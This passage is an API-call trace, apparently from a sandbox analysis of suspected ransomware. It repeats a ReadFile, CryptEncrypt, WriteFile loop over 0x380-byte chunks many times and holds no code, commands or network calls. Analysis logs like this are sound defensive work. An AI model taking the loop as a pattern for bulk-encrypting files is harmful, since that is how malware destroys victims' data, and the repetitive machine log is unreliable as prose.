nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.880] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.880] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.880] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.880] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.881] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.881] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.881] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.881] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.882] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.882] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.882] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.882] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.882] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.882] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.883] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.883] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.883] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.883] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.883] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.883] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.884] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.884] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.884] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.884] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.884] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.884] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.885] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.885] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.885] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.885] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.885] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.886] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.886] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.886] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.886] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.886] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.886] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.886] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.887] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.887] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.887] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.887] WriteFile (in: hFile=0x5d48, 